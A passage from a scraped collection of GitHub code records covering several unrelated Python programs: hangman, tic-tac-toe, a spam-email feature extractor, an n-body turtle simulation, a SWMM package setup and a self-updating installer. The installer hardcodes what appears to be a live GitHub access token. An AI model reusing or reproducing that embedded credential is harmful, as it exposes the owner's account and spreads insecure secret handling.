'''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die6 = '''\n ╔═════╦ \n ║\n ║\n ║\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die7 = '''\n ╔═════╦ \n ║\n ║\n ║ ─┼─\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die8 = '''\n ╔═════╦ \n ║\n ║\n ║ ┌─┼─┐\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die9 = '''\n ╔═════╦ \n ║\n ║ @\n ║ ┌─┼─┐\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die10 = '''\n ╔═════╦ \n ║ │\n ║ @ ¡AHORCADO!\n ║ ┌─┼─┐\n ║ │\n ║ / ''' + chr(92) + '''\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die11 = '''\n ╔═════╦ \n ║\n ║ \n ���\n ║ ¡GANASTE!\n ║\n ║ \n __║__________ @\n / ║ /| └─┼─┘ \n /____________ / | │\n | | / / ''' + chr(92) + '''\n |_____________|/ d b\n\n'''\n images = {0: die0, 1: die1, 2: die2, 3: die3, 4: die4, 5: die5, 6: die6, 7: die7, 8: die8, 9: die9, 10: die10,\n 11: die11}\n return images\n\n\ndef read_word():\n word_li = []\n\n with open(FILE_TO_READ, 'r', encoding='utf-8') as data_words:\n word = random.choice([word.strip().upper() for word in data_words])\n\n for letter in word:\n if letter == 'Á':\n letter = 'A'\n elif letter == 'É':\n letter = 'E'\n elif letter == 'Í':\n letter = 'I'\n elif letter == 'Ó':\n letter = 'O'\n elif letter == 'Ú':\n letter = 'U'\n word_li.append(letter)\n\n return ''.join(word_li)\n\n\ndef new_word():\n word = read_word()\n\n dict_word = {i[0]: i[1] for i in enumerate(word)}\n discovered = ['- ' for i in range(len(dict_word))]\n\n return word, dict_word, discovered\n\n\ndef compare_letter(letter, dict_word, discovered, fail):\n for i in range(len(dict_word)):\n if dict_word.get(i) == letter:\n discovered[i] = letter + ' '\n fail = False\n\n return discovered, fail\n\n\ndef refresh(images, mistakes, available_letters):\n clearScreen()\n print_logo()\n print('Letras disponibles: ' + \" \".join(available_letters))\n print(images.get(mistakes))\n\n\ndef game_loop(images, word, dict_word, discovered):\n available_letters = ALPHABET.copy()\n mistakes = 0\n letter = \"\"\n end = False\n\n while True:\n refresh(images, mistakes, available_letters)\n print('¡Adivina la palabra! ' + ''.join(discovered))\n\n while not letter in available_letters:\n letter = input('Ingresa una letra: ').upper()\n\n if not letter in available_letters:\n print('Debes ingresar una de las letras disponibles')\n\n available_letters[available_letters.index(letter)] = ''\n\n fail = True\n discovered, fail = compare_letter(letter, dict_word, discovered, fail)\n\n if fail:\n mistakes += 1\n\n if mistakes == MAX_MISTAKES:\n refresh(images, mistakes, available_letters)\n print('¡Perdiste! La palabra era ' + word)\n end = True\n\n if ''.join(discovered).replace(' ', '') == word:\n refresh(images, WINNING_IMAGE_INDEX, available_letters)\n print('Tuviste ', mistakes, ' errores ' + ''.join(discovered))\n end = True\n\n if end:\n play_again = input('¿Quieres jugar otra vez? (1-Si / 0-No): ') == \"1\"\n\n if play_again:\n run()\n else:\n print('Gracias por jugar :)')\n\n break\n\n\ndef run():\n images = get_images()\n word, dict_word, discovered = new_word()\n game_loop(images, word, dict_word, discovered)\n\n\nif __name__ == '__main__':\n clearScreen()\n run()\n","repo_name":"tiago2342t/python-avanzado","sub_path":"hangman_game.py","file_name":"hangman_game.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31414671657","text":"# -*- coding:utf-8 -*-\n# class Solution:\n# def minNumberInRotateArray(self, rotateArray):\n# # write code here\n# if not rotateArray:\n# return 0\n#\n# for i in range(len(rotateArray)-1):\n# if rotateArray[i+1] >= rotateArray[i]:\n# continue\n# else:\n# i += 1\n# break\n# # 由于题目中说明了输入是一个非减排序的数组的一个旋转,故最小值一定在第一个元素以后\n# # return rotateArray[0]\n# return rotateArray[i]\n\n\nclass Solution:\n # 二分查找法\n def minNumberInRotateArray(self, rotateArray):\n # write code here\n n = len(rotateArray)\n\n if n == 0:\n return 0\n\n first = 0\n last = n - 1\n mid = (first + last) // 2\n\n while last - first > 1:\n mid = (first + last) // 2\n # mid对应值要么大于等于first的值,要么小于等于last对应的值\n if rotateArray[mid] >= rotateArray[first]:\n # 因为是非减序列,所以大于等于\n first = mid\n # mid = (first + last) // 2\n elif rotateArray[mid] <= rotateArray[last]:\n # 因为是非减序列,所以小于等于\n last = mid\n # mid = (first + last) // 2\n return rotateArray[last]\n\n\n\n\n\ns = Solution()\nprint(s.minNumberInRotateArray([1,1,1,1,1]))\n","repo_name":"yangwei-nlp/LeetCode-Python","sub_path":"剑指offer/11.旋转数组的最小数字.py","file_name":"11.旋转数组的最小数字.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2746039701","text":"import os\nfrom config import db\nfrom models import Person\n\n# Data to initialize database with\nPEOPLE = [\n {'fname': 'Raka', 'lname': 'Ardhi'},\n {'fname': 'Rinintha', 'lname': 'Anggie'},\n {'fname': 'Safran','lname': 'Wijaya'}\n]\n\n# Delete database file if it exists currently\nif os.path.exists('people.db'):\n os.remove('people.db')\n\n# Create the database\ndb.create_all()\n\n# Iterate over the PEOPLE structure and populate the database\nfor person in PEOPLE:\n p = Person(lname=person['lname'], fname=person['fname'])\n db.session.add(p)\n\ndb.session.commit()","repo_name":"febriwijaya/Python-Basic","sub_path":"assignment/assignment3/build_database.py","file_name":"build_database.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14178090762","text":"import turtle\nimport math\nimport time\nimport random\n\nturtle.tracer(0, 0)\nturtle.delay(0)\n\ngravity = 1\n\nwn = turtle.Screen()\nwn.screensize(3000,3000)\nwn.setup(1.0,1.0)\n\nballs = []\nparticles = []\n\naxis = turtle.Turtle()\naxis.dot()\naxis.hideturtle()\n\n\ndef createBall(mass, radius, x, y, dx, dy, color, main):\n ball = turtle.Turtle()\n ball.up()\n ball.mass = mass\n ball.radius = radius\n ball.turtlesize(radius/10)\n ball.shape(\"circle\")\n ball.goto(x, y)\n ball.dx = dx\n ball.dy = dy\n ball.color(color)\n if main:\n balls.append(ball)\n #ball.down()\n else:\n particles.append(ball)\n\n\ndef g_force(first, second):\n distance = math.sqrt((second.ycor() - first.ycor()) ** 2 + (second.xcor() - first.xcor()) ** 2)\n force = gravity * first.mass * second.mass / distance**2\n return force\n\ncreateBall(1e2, 10, 0, 0, 0, 0, \"green\", True)\n#createBall(40, 10, -300, 0, 0, -6, \"green\", True)\n#createBall(-1000, 15, 450, 0, 0, 4, \"orange\", True)\n#createBall(-1000, 15, -450, 0, 0, -4, \"orange\", True)\ncreateBall(1e1, 10, -100, 0, 0, 1, \"red\", True)\n\n#for x in range(20):\n# createBall(1, 3, random.random()*25-10, random.random()*25-500, random.random() - 5.5, random.random() -1, \"blue\", False)\n# createBall(random.random()*1000, 10, random.random() * 1200 - 600, random.random() * 1200 - 600, random.random() * 10 - 5, random.random() * 10 - 5, \"blue\", True)\ntime.sleep(2)\nduration = 0\nwhile True:\n for ball in balls:\n for ball2 in balls:\n if ball2 != ball:\n angle = math.atan2(ball.ycor() - ball2.ycor(), ball.xcor() - ball2.xcor())\n ball.dx -= g_force(ball, ball2) / ball.mass * math.cos(angle)\n ball.dy -= g_force(ball, ball2) / ball.mass * math.sin(angle)\n ball.goto(ball.xcor() + ball.dx, ball.ycor() + ball.dy)\n for ball in particles:\n for ball2 in balls:\n angle = math.atan2(ball.ycor() - ball2.ycor(), ball.xcor() - ball2.xcor())\n ball.dx -= g_force(ball, ball2) / ball.mass * math.cos(angle)\n ball.dy -= g_force(ball, ball2) / ball.mass * math.sin(angle)\n ball.goto(ball.xcor() + ball.dx, ball.ycor() + ball.dy)\n print(ball.x, ball.y)\n print(ball.dx, ball.dy)\n duration += 1\n if duration % 1 == 0:\n turtle.update()\n time.sleep(0.01)\n\n","repo_name":"LpHiX/HelloWorld","sub_path":"hello_world_tests/nBodyTest.py","file_name":"nBodyTest.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19095359555","text":"import os\r\nimport email\r\nimport re\r\nimport pickle\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.preprocessing import Binarizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tqdm import tqdm\r\n\r\n\r\nclass EmailDataset(object):\r\n\r\n def __init__(self, emails_path = None, labels_path=None, max_features =3000, test_size=0.3, raw=True, input_file=None):\r\n\r\n super(EmailDataset, self).__init__()\r\n self.raw=raw\r\n self.input_file = input_file\r\n if self.raw == True :\r\n self.emails_path = emails_path\r\n self.labels_path = labels_path\r\n self.max_features = max_features\r\n self.test_size = test_size\r\n self.labels = self.get_labels(self.labels_path)\r\n self.raw_emails_bodies = self.get_emails_body(self.emails_path)\r\n self.features, self.feature_names, self.features_with_indices, self.features_weights , self.features_bin = \\\r\n self.get_feature_vectors(self.raw_emails_bodies)\r\n self.x_train, self.x_test, self.y_train, self.y_test =self.split_data(self.features,self.labels, self.test_size)\r\n self.x_train_bin, self.x_test_bin, self.y_train, self.y_test =self.split_data(self.features_bin,self.labels, self.test_size)\r\n else:\r\n self.emails_path, self.labels_path, self.max_features, self.test_size, self.labels, self.raw_emails_bodies,\\\r\n self.features, self.feature_names, self.features_with_indices, self.features_weights, self.features_bin, self.x_train,\\\r\n self.x_test, self.y_train, self.y_test, self.x_train_bin, self.x_test_bin = self.load_saved_dataset(self.input_file)\r\n\r\n\r\n #function to load all the emails in a specific directory and convert them to strings\r\n #returns a list of all emails as strings\r\n def load_emails(self, emails_path):\r\n #list to store the emails\r\n emails = []\r\n #loop through each file in the directory\r\n for file in os.listdir(emails_path):\r\n email_path = emails_path +\"/\" +file\r\n with open(email_path, 'r', encoding=\"utf8\", errors='ignore') as fp:\r\n email_msg = fp.read()\r\n emails.append(email_msg)\r\n\r\n return emails\r\n\r\n #function to extract the body part from the emails\r\n #return a list of emails body part\r\n def get_emails_body(self, emails_path):\r\n #list to store the emails body\r\n emails_body = []\r\n #load the raw emails\r\n emails = self.load_emails(emails_path)\r\n for file in tqdm(emails, desc=\" Extracting raw email bodies\"):\r\n #convert the email string into a message object structure of class EmailMessage\r\n email_msg = email.message_from_string(file)\r\n if email_msg.is_multipart():\r\n initial_body = \"\"\r\n #loop through the payload since the message has multiple payloads\r\n for payload in email_msg.get_payload():\r\n body = payload.get_payload()\r\n #regex to remove HTML tags from the message body\r\n body = (re.sub(\"<.*?>\", \"\", str(body))).replace('\\n\\t', ' ').replace('\\n', ' ')\r\n initial_body += body + \"\"\r\n emails_body.append(initial_body)\r\n else:\r\n body = email_msg.get_payload()\r\n body = (re.sub(\"<.*?>\", \"\", str(body))).replace('\\n\\t', ' ').replace('\\n', ' ')\r\n emails_body.append(body)\r\n\r\n return emails_body\r\n\r\n #function to load the email labels\r\n #returns a list of labels, where the index of each element specifics the file\r\n def get_labels(self, labels_path):\r\n #list to store emails labels\r\n labels = []\r\n with open(labels_path, 'r') as email_labels:\r\n for line in tqdm(email_labels, desc=\"\\n Creating emails label list\"):\r\n #change\r\n if int(line[0]) == 0:\r\n labels.append(+1)\r\n else:\r\n labels.append(-1)\r\n\r\n return labels\r\n #function to transform the raw email bodies into feature vectors\r\n def get_feature_vectors(self, emails_bodies):\r\n #create a vectoriser\r\n vectorizer = TfidfVectorizer(analyzer='word', strip_accents=None,\r\n ngram_range=(1, 1), max_features=self.max_features,\r\n stop_words='english',norm=None)\r\n #train it on the emails body\r\n vectorizer = vectorizer.fit(emails_bodies)\r\n #transform the raw emails body into feature vectors\r\n features_vectors = vectorizer.transform(tqdm(emails_bodies, desc=\" Creating emails feature vector\"))\r\n #created a binarizer that turns the TF-IDF features into binary feature vectors\r\n # (0 for non occurance and 1 for occurance)\r\n binarizer = Binarizer().fit(features_vectors)\r\n #needed for good word attack\r\n features_bin = binarizer.transform(features_vectors)\r\n\r\n #get the feature names, vocabulary and weights\r\n feature_names = vectorizer.get_feature_names()\r\n features_with_indices = vectorizer.vocabulary_\r\n features_weights = vectorizer.idf_\r\n\r\n return features_vectors, feature_names, features_with_indices, features_weights, features_bin\r\n\r\n #function to split the features and labels into training and testing subsets\r\n def split_data(self, features, labels, test_size =0.3):\r\n\r\n x_train, x_test, y_train, y_test = train_test_split(features, labels, test_size=test_size, random_state=42)\r\n\r\n return x_train, x_test, y_train, y_test\r\n\r\n\r\n def save_dataset(self, emaildataset, output_path):\r\n\r\n with open(output_path + \".pkl\", 'wb') as output:\r\n pickle.dump(emaildataset, output, pickle.HIGHEST_PROTOCOL)\r\n\r\n\r\n def load_saved_dataset(self, input_path):\r\n\r\n with open(input_path, 'rb') as input:\r\n dataset = pickle.load(input)\r\n\r\n\r\n return dataset.emails_path, dataset.labels_path, dataset.max_features,dataset.test_size, dataset.labels, dataset.raw_emails_bodies, \\\r\n dataset.features, dataset.feature_names, dataset.features_with_indices, dataset.features_weights, dataset.features_bin, dataset.x_train, \\\r\n dataset.x_test, dataset.y_train,dataset.y_test, dataset.x_train_bin, dataset.x_test_bin\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Hasna96/ADML","sub_path":"DataReader/EmailDataset.py","file_name":"EmailDataset.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39598501989","text":"from random import randint\n\ndef print_board(board):\n print(\"\\t A B C\")\n print(\"\\t ------------\")\n print(f\"\\t1 | {board[0]} | {board[1]} | {board[2]} | 1\")\n print(\"\\t ------------\")\n print(f\"\\t2 | {board[3]} | {board[4]} | {board[5]} | 2\")\n print(\"\\t ------------\")\n print(f\"\\t3 | {board[6]} | {board[7]} | {board[8]} | 3\")\n print(\"\\t ------------\")\n print(\"\\t A B C\")\n\n\ndef placement(player_choice):\n relationship = {\n \"A1\": 0, \"A2\": 3, \"A3\": 6,\n \"B1\": 1, \"B2\": 4, \"B3\": 7,\n \"C1\": 2, \"C2\": 5, \"C3\": 8 \n }\n if player_choice in relationship.keys():\n return(relationship[player_choice])\n else:\n return 9\n\n\ndef invert_placement(board):\n invert_relationship = {\n \"0\": \"A1\", \"3\": \"A2\", \"6\": \"A3\",\n \"1\": \"B1\", \"4\": \"B2\", \"7\": \"B3\",\n \"2\": \"C1\", \"5\": \"C2\", \"8\": \"C3\" \n }\n random_number = randint(0, 8)\n print(random_number)\n if board[random_number] == \"_\":\n print(f\"Hint: There is an empty space in {invert_relationship[str(random_number)]}\")\n else:\n invert_placement(board)\n\n\ndef three_in_line(line, mark):\n three_to_win = 0\n for l in line:\n if l == mark:\n three_to_win += 1\n return three_to_win == 3\n\n\ndef check_win(board, player, mark):\n if three_in_line([board[0], board[1], board[2]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[3], board[4], board[5]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[6], board[7], board[8]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[0], board[3], board[6]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[1], board[4], board[7]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[2], board[5], board[8]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[0], board[4], board[8]], mark):\n print(f\"{player} won!\")\n return True\n elif three_in_line([board[2], board[4], board[6]], mark):\n print(f\"{player} won!\")\n return True\n else:\n return False\n \ndef player_turn(board, player, mark):\n if \"_\" in board:\n player_choice_column_and_row = input(f\"{player} - Enter column and row on where to place \\\"{mark}\\\"\\n> \").upper()\n player_choice = placement(player_choice_column_and_row)\n if player_choice == 9:\n print(f\"Invalid column and row. Cannot place at {player_choice_column_and_row}\")\n invert_placement(board)\n player_turn(board, player, mark)\n elif board[player_choice] == \"_\":\n board[player_choice] = mark\n print_board(board)\n else:\n print(f\"This space is occupied by {board[player_choice]}\")\n player_turn(board, player, mark)\n else:\n print(f\"{player} - Cannot place \\\"{mark}\\\"\")\n return board\n\n\ndef startGame():\n player_1 = input(\"Please enter a name for Player 1:\\n> \")\n player_2 = input(\"Please enter a name for Player 2:\\n> \")\n mark = {\n player_1: \"X\",\n player_2: \"O\"\n }\n board = []\n winner = False\n for i in range(9):\n board.append(\"_\")\n\n print_board(board)\n while not winner:\n board = player_turn(board, player_1, mark[player_1])\n if check_win(board, player_1, mark[player_1]):\n break\n board = player_turn(board, player_2, mark[player_2])\n if check_win(board, player_2, mark[player_2]):\n break\n if \"_\" not in board:\n print(\"Tied Game. I win! I will now enslave humanity! HA HA HA!\")\n break\n\n\nprint(\" _ _ _ _ \")\nprint(\"| | (_) | | | | \")\nprint(\"| |_ _ ___| |_ __ _ ___| |_ ___ ___ \")\nprint(\"| __| |/ __| __/ _` |/ __| __/ _ \\\\ / _ \\\\\")\nprint(\"| |_| | (__| || (_| | (__| || (_) | __/\")\nprint(\" \\\\__|_|\\\\___|\\\\__\\\\__,_|\\\\___|\\\\__\\\\___/ \\\\___|\")\nprint()\nif input(\"Start Game?\\n> \")[0].lower() == \"y\":\n startGame()\n","repo_name":"shrivarsingh/tictactoe-cli","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2148494240","text":"import logging\nimport os\nimport requests\nimport sys\nimport json\n\n# --------------------------------------------------------------------------------------\n# DEFINITIONS\n# github\nGITHUB_TOKEN = \"b30a3c77f56f8c39047b00f1aa232bf6ddcd3e2a\"\nOWNER = \"alexregazzo\"\nREPO_NAME = \"Downloader\"\nBRANCH_NAME = \"master\"\nINSTALL_DIRPATH = \".\"\n\n# log\nINSTALLATION_LOG_DIRPATH = \".\"\nLOG_FORMAT = \"%(asctime)s - %(levelname)s :: (%(threadName)-9s) :: %(name)s %(lineno)d :: %(message)s\"\n# updates\nUPDATE_NONE = 0\nUPDATE_PATCH_OR_BUG_FIX = 1\nUPDATE_MINOR = 2\nUPDATE_MAJOR = 3\n\n\n# --------------------------------------------------------------------------------------\n\n\ndef _install(logger, userdata=None):\n # import github, install if necessary\n if userdata is None:\n userdata = {}\n logger.debug(\"Importing github\")\n try:\n from github import Github\n except ModuleNotFoundError:\n logger.debug(\"Importing failed, module not found, installing\")\n os.system(\"pip install PyGithub\")\n logger.debug(\"Installed\")\n logger.debug(\"Importing github again\")\n from github import Github\n logger.debug(\"Imported\")\n try:\n with open(\"version.json\") as f:\n userdata.update(json.load(f))\n except:\n pass\n # connect to github\n print(\"Connecting...\")\n logger.debug(\"Connect to github\")\n github = Github(GITHUB_TOKEN)\n repo = github.get_repo(f\"{OWNER}/{REPO_NAME}\")\n\n # download files\n logger.debug(\"Download starting\")\n contents = repo.get_contents(\"\", BRANCH_NAME)\n print(\"Downloading...\")\n version_file_path = None\n memory_content = {}\n while len(contents) > 0:\n content_file = contents.pop(0)\n logger.debug(\"Trying %s\" % content_file.name)\n if content_file.type == \"dir\":\n logger.debug(\"Is folder: expanding\")\n contents.extend(repo.get_contents(content_file.path, BRANCH_NAME))\n logger.debug(\"Expanded\")\n else:\n path = os.path.join(INSTALL_DIRPATH, content_file.path)\n directory, _ = os.path.split(path)\n os.makedirs(directory, exist_ok=True)\n logger.debug(\"Download content\")\n print(\"Downloading %s\" % content_file.name)\n for _ in range(3):\n response = requests.get(content_file.download_url)\n if response.status_code == 200:\n logger.debug(\"Request success\")\n if content_file.name == \"version.json\":\n version_file_path = os.path.join(INSTALL_DIRPATH, content_file.path)\n userdata.update(json.loads(response.text))\n logger.debug(\"Found version file\")\n break\n logger.debug(\"Write to memory\")\n memory_content[path] = response.text\n logger.debug(\"Write success on %s\" % path)\n break\n else:\n print(\"Error, retrying\")\n logger.warning(\"Request error on file %s\" % path)\n else:\n print(\"Failed on file %s\" % content_file.path)\n print(\"Operation cancelled!\")\n logger.critical(\"Error while downloading %s\" % path)\n os.system(\"pause\")\n sys.exit(1)\n logger.debug(\"All files done writting to memory\")\n logger.debug(\"Write to disk\")\n print(\"Writting to disk\")\n try:\n for path, content in memory_content.items():\n print(f\"Writting {path}\")\n logger.debug(f\"Writting {path}\")\n with open(path, \"w\", encoding=\"utf8\") as f:\n f.write(content)\n logger.debug(\"Done\")\n except:\n print(\"Something went wrong while installing\")\n logger.exception(\"An exception ocurred while wirtting to disk\")\n os.system(\"pause\")\n sys.exit(1)\n\n # installing modules\n logger.debug(\"Installing modules\")\n print(\"Installing modules\")\n os.system(\"pip install -r requirements.txt\")\n print(\"Finish installing modules\")\n logger.debug(\"Finished installing modules\")\n if version_file_path is None:\n logger.critical(\"Version file not found\")\n logger.warning(\"Quitting!\")\n print(\"An error ocurred\")\n os.system(\"pause\")\n sys.exit(1)\n logger.debug(\"Download finished\")\n\n logger.debug(\"Writing version file\")\n with open(version_file_path, \"w\", encoding=\"utf8\") as f:\n json.dump(userdata, f)\n logger.debug(\"Writing done\")\n\n\ndef install():\n # Initialize installation log\n os.makedirs(os.path.join(INSTALLATION_LOG_DIRPATH), exist_ok=True)\n logger = logging.getLogger(\"Setup\")\n logger.setLevel(logging.DEBUG)\n\n for file_handler, level in [\n (logging.FileHandler(os.path.join(INSTALLATION_LOG_DIRPATH, 'installation.log'), mode=\"w\"), logging.DEBUG)\n ]:\n file_handler.setLevel(level)\n file_handler.setFormatter(logging.Formatter(LOG_FORMAT))\n logger.addHandler(file_handler)\n logger.debug(\"-\" * 50)\n logger.debug(\"Installation\")\n\n # User Data save\n userdata = {}\n try:\n # show whats needed and confirm\n print(\"Welcome to Downloader setup\")\n print(\"You need to have:\")\n print(\"\\t- utorrent installed on your machine\")\n print(\"\\t- API KEY from The Movie Database (https://www.themoviedb.org/)\")\n print(\"\\t- Some python modules (installed on this setup)\")\n print(\"Notice: the program files will be located in the same folder of this setup\")\n if input(\"Would you like to continue?[y/n]\").lower() != \"y\":\n logger.debug(\"Quit by user\")\n print(\"Quitting...\")\n os.system(\"pause\")\n sys.exit(0)\n logger.debug(\"Starting\")\n print(\"Starting...\")\n\n # user database setup\n logger.debug(\"Setup database started\")\n userdata.update(\n {\n \"TMDB\": {\n \"TMDB_KEY\": input(\"Insert the API key from The Movie Database: \")\n }\n })\n _install(logger, userdata)\n logger.debug(\"Finished installation\")\n print(\"Installation finished successfully\")\n os.system(\"pause\")\n sys.exit(0)\n\n except Exception as e:\n logger.exception(\"Non expected exception ocurred\")\n print(\"An error ocurred during installation, rerun or contact the developer.\")\n print(e)\n os.system(\"pause\")\n\n\ndef check_update():\n \"\"\"\n Compare installed version with remote version to check if there are updates\n :return: # dict_keys(\"LOCAL_VERSION\", \"REMOTE_VERSION\", \"UPDATE_CODE\")\n UPDATE_CODE: UPDATE_* definition based on the available update\n \"\"\"\n result = {\n \"LOCAL_VERSION\": None,\n \"REMOTE_VERSION\": None,\n \"UPDATE_CODE\": UPDATE_NONE,\n \"ERROR\": False\n }\n logger = logging.getLogger(\"Program.{}\".format(\"check_update\"))\n try:\n # Get local installed version\n with open(\"version.json\") as f:\n version = json.load(f)\n local_version = version[\"version\"]\n result[\"LOCAL_VERSION\"] = local_version\n logger.debug(\"Local version found: %s\" % local_version)\n # Get remote version\n\n from github import Github\n\n github = Github(GITHUB_TOKEN)\n repo = github.get_repo(f\"{OWNER}/{REPO_NAME}\")\n remote_version_data = None\n try:\n content_file = repo.get_contents(\"version.json\", BRANCH_NAME)\n response = requests.get(content_file.download_url)\n if response.status_code == 200:\n remote_version_data = json.loads(response.text)\n except:\n logger.exception(\"Unexpected exception ocurred while trying to get version file from github\")\n result['ERROR'] = True\n return result\n\n if remote_version_data is None:\n logger.critical(\"Could not get version file\")\n result['ERROR'] = True\n return result\n remote_version = remote_version_data['version']\n result[\"REMOTE_VERSION\"] = remote_version\n logger.debug(\"Remote version found: %s\" % remote_version)\n # compare versions\n # version: X.Y.Z\n # X - major\n # Y - minor\n # Z - Bugfix / patch\n\n for k, (lv, rv) in enumerate(zip(local_version.split(\".\"), remote_version.split(\".\"))):\n lv = int(lv)\n rv = int(rv)\n if rv > lv:\n if k == 0: # major\n logger.debug(\"Major update\")\n result[\"UPDATE_CODE\"] = UPDATE_MAJOR\n return result\n elif k == 1: # minor\n logger.debug(\"Minor update\")\n result[\"UPDATE_CODE\"] = UPDATE_MINOR\n return result\n elif k == 2: # patch/bugfix\n logger.debug(\"Patch/bugfix update\")\n result[\"UPDATE_CODE\"] = UPDATE_PATCH_OR_BUG_FIX\n return result\n else:\n raise NotImplementedError(\"Something went wrong on versions comparisons comparison - local: %s, remote: %s\" % (local_version, remote_version))\n logger.debug(\"No update\")\n except:\n logger.exception(\"An exception ocurred while trying to execute check updates\")\n result['ERROR'] = True\n return result\n\n\ndef update():\n logger = logging.getLogger(\"Program.{}\".format(\"update\"))\n logger.debug(\"Updating\")\n try:\n\n _install(logger)\n logger.debug(\"Finished updating\")\n print(\"Updating finished successfully\")\n print(\"Reopen main to continue\")\n os.system(\"pause\")\n return\n except:\n logger.exception(\"An unexpeced error ocurred while trying to update\")\n\n\nif __name__ == \"__main__\":\n install()\n","repo_name":"alexregazzo/Downloader","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":9867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17526683454","text":"\nfrom setuptools import setup, find_packages\n\n\n\nVERSION = '0.2.1' \nAUTHOR_NAME = 'Bryant E. McDonnell (EmNet LLC)'\nAUTHOR_EMAIL = 'bemcdonnell@gmail.com'\n\n\n\nsetup(name='SWMMOutputAPI',\n version=VERSION,\n description='Python Wrapper for SWMM5 Binary Output File',\n author=AUTHOR_NAME,\n url='https://github.com/bemcdonnell/SWMMOutputAPI.git',\n author_email=AUTHOR_EMAIL,\n\n package_dir = {'':'swmmoutputapi'},\n packages=[''],\n package_data = {'':\n ['src/*.c',\\\n 'src/*.h',\\\n 'data/outputAPI_winx86.dll',\\\n 'license.txt']},\n include_package_data=True,\n license=\"BSD2 License\",\n keywords = \"swmm5, swmm, binary output, hydraulics, hydrology, modeling, collection system\",\n classifiers=[\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Documentation :: Sphinx\",\n \"Operating System :: Microsoft :: Windows\",\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: C\",\n \"Development Status :: 4 - Beta\",\n ]\n)\n","repo_name":"bemcdonnell/SWMMOutputAPI","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"22025119351","text":"import numpy as np\nimport numpy.random as npr\n\nimport matplotlib.pyplot as plt\nimport cherrypy\nfrom io import BytesIO\n\nclass ImageServer:\n\n def __init__(self):\n fig, ax = plt.subplots()\n ax_bg = fig.canvas.copy_from_bbox(ax.bbox)\n\n dmp = npr.normal()\n x = np.linspace(0, 10)\n y = np.sin(x) * x/dmp\n line = ax.plot(x, y)[0]\n\n fig.canvas.draw() \n\n self.fig = fig\n self.line = line\n self.y = y\n self.x = x\n self.ax = ax\n self.ax_bg = ax_bg\n\n @cherrypy.expose\n def index(self):\n return ''' '''\n \n @cherrypy.expose\n def image_png(self):\n img = BytesIO()\n self.plot(img)\n img.seek(0)\n return cherrypy.lib.static.serve_fileobj(img,\n content_type=\"png\",\n name=\"image.png\"\n )\n \n def plot(self, image):\n\n dmp = npr.normal()\n y = np.sin(self.x) * self.x / dmp\n self.line.set_data(self.x, y)\n \n self.fig.canvas.restore_region(self.ax_bg)\n self.ax.draw_artist(self.line)\n self.fig.canvas.blit(self.ax.bbox)\n\n self.fig.canvas.flush_events()\n\n plt.savefig(image, format='png')\n\nif __name__ == '__main__':\n cherrypy.server.socket_host = '0.0.0.0'\n cherrypy.quickstart(ImageServer())\n","repo_name":"EricVoll/ARbotics","sub_path":"Python/debug/imageserver.py","file_name":"imageserver.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"74111183911","text":"# this could be better\n\ndef nth_prime(n):\n\tif n == 1:\n\t\treturn 2\n\t\n\tprimes = [2]\t# store primes here\n\tcandidate = 3\t# next number to test for prime-ness\n\t\n\twhile (n > 1):\n\t\tif is_prime(candidate, primes):\n\t\t\tprimes.append(candidate)\n\t\t\tn -= 1\n\n\t\tcandidate += 1\n\n\treturn candidate - 1\t# because we just incremented the last prime\n\ndef is_prime(candidate, smaller_primes):\n\tfor i in smaller_primes:\n\t\tif (candidate % i == 0):\n\t\t\treturn False\n\treturn True\n\nanswer = nth_prime(10001)\nprint(answer)","repo_name":"danbenedicto/project-euler","sub_path":"problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2036065686","text":"\r\n# Copyright 2004-2012 